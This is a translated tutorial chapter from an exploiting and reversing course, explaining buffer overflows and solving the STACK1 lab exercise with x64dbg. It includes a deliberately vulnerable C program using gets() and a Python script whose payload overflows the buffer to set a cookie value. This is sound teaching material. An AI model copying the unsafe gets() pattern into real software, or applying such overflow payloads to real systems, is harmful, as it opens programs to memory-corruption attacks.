Introduction to exploiting and reversing using IDA FREE and other free tools. Chapter 2

In the first part, we installed several tools that will be useful for us to take this course. Their feature is that they are all free. We will not use any paid tool, and of those that have a paid version, such as IDA or PYCHARM, we will use the FREE or COMMUNITY version.

Let's look at some concepts before we get started with the exercises.

What is a BAG?

BAG is the result of a failure or lack in the process of creating computer programs (software) or a computer. The specified failure can occur at any stage of the software life cycle, although the most obvious failure occurs at the development and programming stage.

As I always say, a programmer can make mistakes, and these errors can cause program crashes or bugs. So far, I have not said anything new.

The question is to know the difference between BAG and VULNERABILITY, so let's see what VULNERABILITY is.

What is VULNERABILITY?

VULNERABILITY is a certain type of bug in a program that allows using it to violate the security of a computer system.

Thus, vulnerabilities allow you to perform actions for which the program was not intended, and abuse them.

In other words, vulnerability is a certain type of bug, a subset between them.



Of course, there are many types of vulnerabilities. We are going to focus on the study and exploitation of vulnerabilities in WINDOWS.

What is EXPLOIT?


EXPLOIT is a computer program that tries to exploit some vulnerability of another program. The ultimate goal of an exploit can be malicious, for example, as destroying or shutting down an attacked system, although it is usually a violation of security measures in order to gain access to information in an unauthorized way and use it in their own interests or as a source of other attacks on third parties.

Abuse of the vulnerability can lead to the failure of the application or the system itself, the execution of native code on local or remote machines. Its operation and complexity depend on the vulnerability itself, the environment and the measures that the goal has during the operation.

The first type of vulnerabilities we will examine will be buffer overflows. We will start with the simplest examples, and then we will gradually increase the complexity.

At first, the system’s security features will not be activated, but gradually we will activate them to find out how we can deal with them and in what situations.

What is a BUFFER?


BUFFER is a memory space of a certain size reserved for data storage and management.

A basic example is a 20 liter jar, which I have for storing contents. It can be less than or equal to 20 liters, which is the maximum size. If you want to store more in one tank, you must find a way to increase the size of the buffer, otherwise when you try to save, for example, 40 liters in a 20-liter can, it will overflow.

What is a BUFFER OVERFILL?


BUFFER OVERFLOW occurs when a computer program exceeds the amount of memory reserved for it by writing data to a contiguous memory block.

https://www.welivesecurity.com/la-es/tag/buffer-overflow-la-es

In truth, a buffer overflow occurs in an application when it does not have the necessary security checks in its program code, such as measuring the amount of data which will be copied to the buffer and which do not exceed the buffer size.

The most common types of buffer overflows are stack buffer overflows and heap buffer overflows.

Here we see the definition of buffer overflow, and in our previous example, if I try to pour 40 liters into a 20 liter tank, it will overflow, as we understand it. This is an overflow that causes a buffer overflow, i.e. overflow of my tank when its maximum capacity is exceeded.

Now explain the difference between the stack and the heap.

What is a STACK?


STACK is used to store local function variables that are needed only as long as the function is executed. In most programming languages, it is important that we know at compile time how large a variable is if we want to keep it on the stack.

What is a LOT?


Heap is used to reserve dynamic memory, the useful life of which is not known in advance, but it is expected that it will last some time. If we do not know its size or it is determined at runtime, the size must be calculated and reserved on the heap.

The heap is also used for objects that vary in size because we do not know at compile time how long they will be used.

I have been working in our company for more than 13 years as the author of exploits, and the first thing we do with all the hired people even did to me when I joined was to try to unravel the stacks and heaps of the famous GERARDO RICHART. He is one of the founders of CORE SECURITY and an exploit analysis guru.

We will start slowly with the simplest stacks. Of course, as I said, they are compiled at the moment with minimal protection and are 32-bit in order to facilitate operation.

Let's look at the source code for the STACK1 task.

https://drive.google.com/open?id=16btJAetpa1V5yHDZE2bnnFWTQNpsUR4H

We see a folder with exercises, and inside is the source code STACK1 called STACK1_VS_2017.CPP.

#define _CRT_SECURE_NO_WARNINGS
#define _CRT_SECURE_NO_DEPRECATE

#include <stdlib.h>
#include  <stdio.h> 
#include "Windows.h"


int main(int argc, char **argv) 
{


	MessageBoxA((HWND)-0, (LPCSTR) "Imprimir You win..\n", (LPCSTR)"Vamosss", (UINT)0);

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}


We will try to understand this code and see where the buffer overflow may occur, and whether it will be a buffer overflow on the stack or on the heap.

The MessageBoxA function call was added to the STACK1 source code to show us a small message prompting us to solve it. This is just an addition that does not affect anything. This is a standard call to the specified WINDOWS function, which we will not analyze here.

Who needs information on this function, you can get it here.

We know that inside the function, if there are local variables, you must reserve a place for them.

So we are left with this source code created by GERARDO RICHART.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

We see in red the first part of the program, where reserved space for local variables. In this case, there are two local variables, COOKIE and BUF.

You can see the data types in the table . Other types of variables are also located there.

The code will be compiled into 32 bits.

We see that the COOKIE variable will be of type INT, so 4 bytes of memory will be reserved for this variable.



In the case of the BUF variable, we see that it is an array or a string of characters (character size = 1 byte).



Those. it will be an array of 80 characters, i.e. its length will be 80x1 = 80 bytes.

Anyone who does not know what an array can read about it here:

https://www.programiz.com/c-programming/c-arrays

Thus, an array can store many values ​​of the same data type. You just have to tell him what type of data will be and how much there will be.



In the first example, this is an array of integers, i.e. it will be 100 bytes, and since each integer takes 4 bytes, the length of the array will be 100 x 4 = 400 bytes.

In the second example, FLOAT takes 4 bytes, so it will be an array of 5 FLOAT, so its length will be 5 x 4 = 20 bytes.

When we analyze the array at a low level, we will see that it is a reserved memory space or buffer. This is not the only way to reserve memory space. There are other types of variable data that also require reserve space in memory that will be buffers for storing their contents.

Returning to our exercise:

char buf[80];

This is an array of characters 80 x 1 = 80 bytes long, i.e. it looks like our 20 liter jar. If we try to store more than 80 bytes, the bank will overflow.

Now let's see where the BUF buffer is used.



We see that the buffer is used in two places marked with red arrows.

The first instruction has a PRINTF function, which is used to display a message in the console, which will be a quoted string.

"buf: %08x cookie: %08x\n"

But the PRINTF function not only prints the string in quotation marks, but it also prints the string in the specified format. The percentages inside tell us that an output line will be created. We see that the string is only the first argument to the function. The output format and other arguments may be several (there will be one for each argument% in the format). In our case, there are two of them.



In this case, we have two% X formats, so if I refer to the PRINTF format table:



We see that the function will take these integers (INT) and insert them into the output line with the base of the number system 16, i.e. in hexadecimal format. 08 indicates that if the number contains less than 8 digits, the function will fill it with spaces.

The output for “buf:% 31x”, & buf will be like this

buf:             19FED4 

We see that in this example are filled with spaces before the number. There are several modifiers to show the output.

All possible cases are listed here:

http://www.cplusplus.com/reference/cstdio/printf/

Our case is this:





We see that the result is not truncated, it is filled with spaces only if the length of the argument to insert is less than the value before X.

Therefore, we know that the function prints two hexadecimal numbers, which are obtained from two arguments.

printf("buf: %08x cookie: %08x\n", &buf, &cookie);

We know that a variable has a memory address and a value that can be stored. It looks like our 20 liter jar. It has its content or meaning, i.e. liters stored inside, but also if I have a garage full of similar cans I need some way to determine where the can I want is among all the ones that I have.

The & symbol indicates this. It returns the address or location of the jar, not its contents or value.

Definition of AMPERSAND


AMPERSAND is used to indicate the memory address of the variable in which data will be stored.

Therefore, if I run the executable file in the console, I will see, for example, that when it executes the PRINTF function, it will print:



The addresses may change on your PC, but since the lower address of both addresses matches the BUF address, we see that they are located in this way:



The BUF address is less than the COOKIE address, so it will increase.

And what do these variable addresses tell us? (In my case, & BUF = 0x19FED4 and & COOKIE = 0x19FF24)



Both are in hexadecimal format. Remember this was the% X format? So I put 0x ahead to distinguish decimal numbers that we will represent without any additions.

If I do a subtraction in the PYTHON console or in PYCHARM:



We get a result of 80 bytes, since the COOKIE variable supposedly starts exactly where the BUF buffer ends, so the difference gives us the size of the buffer.

Often, when we make this type of variable based on source code, it may happen that the compiler gives us a larger size than the one that is reserved in the source code. The compiler guarantees that it will reserve at least 80 bytes, i.e. he can reserve more, not less.

The fact is that we already know something about the code, the size of the variables and their location due to the fact that it has the PRINTF function.

Now let's look at another place where the BUF buffer is used, because now the program only prints its address, but does not use it to store data in it.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

Here, on the red line, GET is a function for entering data from the keyboard. Data will be entered until I press Enter.

The program cannot limit the amount of data entered by the user, and there is also no way to verify this data. Everything that is entered before pressing the ENTER key is copied to the BUF buffer.

This is the problem. We said that BUF can only store 80 bytes maximum, so if we enter more, we will create a buffer overflow, and here are all the conditions for this, because if the user writes more than 80 bytes, then our tank will overflow and the liquid will drip down .



The fact is that under the BUF is the COOKIE variable, so the overflow will overwrite and fill it with a value that you can control.

For example, if someone who prints writes 80 * A and 4 * B, 80 * A will fill in BUF, and 4 * B will fill in COOKIE, and as we know, when someone prints a character in the console, the value will remain low. ASCII.



Since the cookie will be filled with four letters B, which are equivalent to a value of 0x42, we can guarantee that the cookie value will be 0x42424242, i.e. on my computer, the cookie address 0x19FF24 will have 0x42424242 as the content.

0x19FF24 => 42424242



The fact is that we have already seen how to overflow and control the COOKIE value.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

You must print “you win” to complete the exercise. For this, the COOKIE must be equal to the value 0x41424344, and if there were no overflow, this would be impossible, since the COOKIE value has never changed from the very beginning of the program. We won’t be able to print “you win”, and for this we use a buffer overflow, which says that this can cause the program to perform some action other than what was programmed.

In this case, you can never type “you win”, only overflow will allow you to do this.

AAAAAAAA

In other words, instead of passing, for example, 80 * A and 4 * B, to print “you win”, you must pass 80 * A and then the letters DCBA, as this will cause the values ​​to be stored in the COOKIE ASCII.

44434241

https://www.arumeinformatica.es/blog/los-formatos-big-endian-y-little-endian/

The format in which data is stored is LITTLE ENDIAN. In other words, the data in memory is stored in reverse order, to put it simply.



And if the sequence 0x41424344 is saved, the system will save it in memory as:

44 43 42 41

For this reason, when copying to memory, copying will occur as we type, so we must write the value in the reverse order so that when reading from memory it was in the right shape.

We can run the executable in the console.



And the cursor will flash, as the GET function asks me to enter the input. Carefully type 80 characters A and then DCBA.

In the PYTHON or PYCHARM console, I can print the line, copy it without quotes and paste it into the console so as not to print it like crazy, and then press the ENTER key to enter it.





We see that we got “you win”.

We can see this in the debugger. For this we will use X64DBG.



I choose the 32 bit version.





If we stop at the NTDLL.DLL library, we press RUN again with F9.

We see that the debugger stops at the first instruction of the STACK1 module, which is called ENTRY POINT or the first instruction executed by the module.



Obviously this is not like our source code. You must understand that the compiler adds a lot of code to make the executable work and run correctly. We will try to find our main function. We can orient ourselves by looking at the lines of the program.



We selected only search in the current region. We know that the lines will be in the same section.



Here we see that there are program lines and others that the compiler added. We double click on one of our lines.



Now you can see a lot more. We see a call to the MessageBoxA, PRINTF, GETS function and a comparison with the value 0x41424344.

In addition, we are adding a plugin for decompiling SNOWMAN. We can try to see how it decompiles the code, i.e. how he is trying to get the source code or something as similar as possible from the compiled file.





We see that this is not perfect, but it is better than what it was.

I am going to put BP at the beginning of the function and press F9 until the debugger stops.



For those who do not know what a function argument is.



In our case, the main function has arguments, but they are not used inside the function.

int main(int argc, char **argv) 
{

	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344) printf("you win!\n");

}

Here we see that there are two arguments, and they are passed through the stack when the executable is compiled into 32 bits.

Just before the function call, the arguments will be stored on the stack.

When we stop at the beginning of the function, the first value on the stack will be RETURN ADDRESS, i.e. where the function will return after the function completes, and below this value will be the arguments of this function.

If I right-click on RETURN ADDRESS and select FOLLOW DWORD IN DISASSEMBLER, I will see where the debugger should return after the function completes.



He will come back here. This means that the main function was called from a call that is higher. I can put BP here, restart the exercise and make sure that it is.



I will put BP a little earlier and reboot the program.



The debugger will stop here.



It is going to save the arguments to the main function using these PUSH instructions.

Below is a link for those who want to know more about the function arguments:

https://publications.gbdirect.co.uk/c_book/chapter10/arguments_to_main.html

This is not very difficult. The first argument to ARGC is INT, which indicates the number of console parameters used to execute the program, including the path to the executable, and ARGV is an array of pointers to strings.

We see that if I change the command line, I will pass more arguments and reload.





Here the debugger stops when it is about to save arguments using the PUSH instruction. The first argument that is stored is the farthest, and the last that you save will be the first argument to the function.

I trace and each PUSH instruction saves the arguments.



Here I can see the arguments of the function. Above is the first argument to ARGC. It is 3, as it marks the number of arguments that are passed to the console.



Here are 3 arguments.

Now we press F7 to do STEP INTO and enter the function.

Here we see that when entering the CALL, the debugger saves the RETURN ADDRESS to the stack.



So, as we said when entering the function, the first thing that will be saved on the stack is RETURN ADDRESS (in 32-bit compilation), and below are the arguments to the function, first the first argument, and then the rest in sequence.



The second argument, as we saw, is an array of pointers. Here we see in memory that there are three pointers to three lines that are passed as arguments.



Here we stopped at the beginning of the function, a little lower we have RETURN ADDRESSES and ARGUMENTS.

We clarify that the file is compiled in 32-bit, because in the 64-bit version, the arguments are passed in a different way. We will see it later.

Then the function begins to execute. The first thing is the so-called PROLOGUE, which stores the EBP value of the function that called ours.



This will keep the EBP value just above the return address.



If I follow the instructions using F7.

I see that the EBP GUARDADO value is on the stack above the return address.



The following instruction in PROLOGUE:

MOV EBP, ESP

It sets the EBP value for the current function that was saved and was the parent function that calls ours (In this case, my main function is the EBP-based function, in other cases it may be different, and we see them later)

By placing the current ESP value in EBP, we ensure that we create a frame for our current function.



Now, since this function is based on EBP or EBP BASED, the EBP value will be stored inside the function and it will be accepted as a reference, and the ESP will change.



This EBP value is taken as the base.

In EBP-based functions, variables and arguments can be named by their distance from this address, which will be stored in the EBP value until its epilogue.

We can see several variables in the list that are referred to as EBP-4 or EBP-54, referring to the EBP value that it is currently accepting.

We can say that as soon as the EBP takes on its value after the PROLOGUE, it will look like a drain, so the arguments will always go in that direction, therefore EBP + XXX refers to the arguments (the stored EBP and the RETURN ADDRESS are also lower, but will not have links in the code), while the variables, as we will see, will be above this address, so the link to EBP-XXX refers to some local variable.

Thus, in EBP-based functions:

EBP + XXXX = arguments passed to the function
EBP - XXXX = local function variables

After PROLOGUE there will be some way to reserve space for variables. In our case, this is done by moving the ESP up so that the remaining space below is reserved for the sum of all variable lengths and, sometimes, a little more just in case, which depends on the compiler.

00401043 | 83EC 54 | SUB ESP, 54

We see that the ESP is located above the EBP, which will remain the link, and that 0x54 converted to decimal is 84, which is the sum of the BUF and COOKIE lengths. Remember that they were 80 and 4 respectively.







On execution, a space is created for the BUF and COOKIE variables of 84 bytes in size. You can click the first column in the horizontal direction and look at the EBP value and find that value on the stack. Obviously, now it will be lower.



I double click here.



Thus, we will have values ​​regarding EBP also on the stack.

For example, EBP-4 matches the listing, -4 is displayed in the first column of the stack, and in the explanation, is also displayed as EBP-4.



If I trace, we see that from the place where the ESP was located to reserve the variables, it will always move up, because it must take into account the space allocated for the variables. When performing 4 PUSHs for MessageBoxA, the debugger places the variables above the reserved space and increases the ESP.



If I look at the stack, I see 4 green arguments that I add over the reserved space marked in red.



When you enter the MessageBoxA function, the RETURN ADDRESS of this function is stored on the stack.



Here is the return address of MessageBoxA. When I get to the RET of this function by tracing with F8, and I execute MessageBoxA.



We see that the debugger will go back just below the MessageBoxA call.



And the PUSH values ​​that you passed for the MessageBoxA function and the RETURN ADDRESS for this function have already been used, and the ESP is again just above the reserved area, as before any function was called. The same thing will happen with calling the PRINTF function.

After you pass the PRINTF function, the BUF and COOKIE addresses will be printed.



The BUF address on my machine will be 0x19FED4, and the COOKIE address will be 0x19FF24.

Here, the program reads the BUF address to pass it to the GETS function and populate the BUF. We can check if the address matches what the 0x19FED4 console shows.





Here we see that it is EBP-54. If I double-click on the stack where it shows -54, it will show that the address is BUF = 0x19FED4 on my machine.



Now, when I will save the entered data at this address, I can put them in a dump to see how bytes are stored there.





Here they are. Moreover, nothing is displayed below, since there is no data.

When I call the GETS function using F8, I will need to go to the console, type and press ENTER to fill the BUF buffer and rewrite the COOKIE.



We see that the COOKIE variable was at 19FF24 on my machine.

Here, the program compares the cookie with 0x41424344.



We see that EBP-4 says it is a COOKIE, in addition to the address, if we set the HORIZON to the EBP value, as before.



I double click here.

We see that EBP-4 is a COOKIE, since the variable is at the -4 stack level, zeroing out the HORIZON.



We see that the program will not jump and will show us you win!





So we manually achieve the goal that you win! Says.

We dynamically analyzed STACK1 using X64DBG, which is a debugger and does not allow us to analyze the program without starting it. To do this, we must use other tools, such as IDA PRO, GHIDRA or RADARE.

I can make a script model for operating the exercise from PYTHON.

import sys
from subprocess import Popen, PIPE

payload = b"A" * 80 + b"\x44\x43\x42\x41"

p1 = Popen(r"C:\Users\ricardo\Desktop\abos y stack nuevos\STACK1_VS_2017.exe", stdin=PIPE)
print ("PID: %s" % hex(p1.pid))
print ("Enter para continuar")
p1.communicate(payload)
p1.wait()
input()

In the case of PYTHON 3, I have to put parentheses in the PRINT function and be careful when adding lines that should be bytes (put b in front of the lines in PYTHON 2).

I check that the path is correct and when I run the file.



Good. We already have a script model for PYTHON 3 for operating STACK1. In the next part, we will continue the static analysis in IDA, RADARE and GHIDRA.


Please note that in addition to the STACK1 task, there are also versions 2, 3 and 4. You can try to solve them. They are very simple and similar to STACK1, so don't be bored.

In the next part we will see IDA FREE, RADARE and GHIDRA.

See you in the next part 3.

Ricardo Narvaha
25/10/2019

PS # 1
A beautiful PDF can be downloaded on my home page - yasha.su

PS # 2
Soon I will write a continuation of the article https://habr.com/en/post/464117/ about how I collected help for Father Chris Kaspersky and what of this happened.

Do not get bored.

All Articles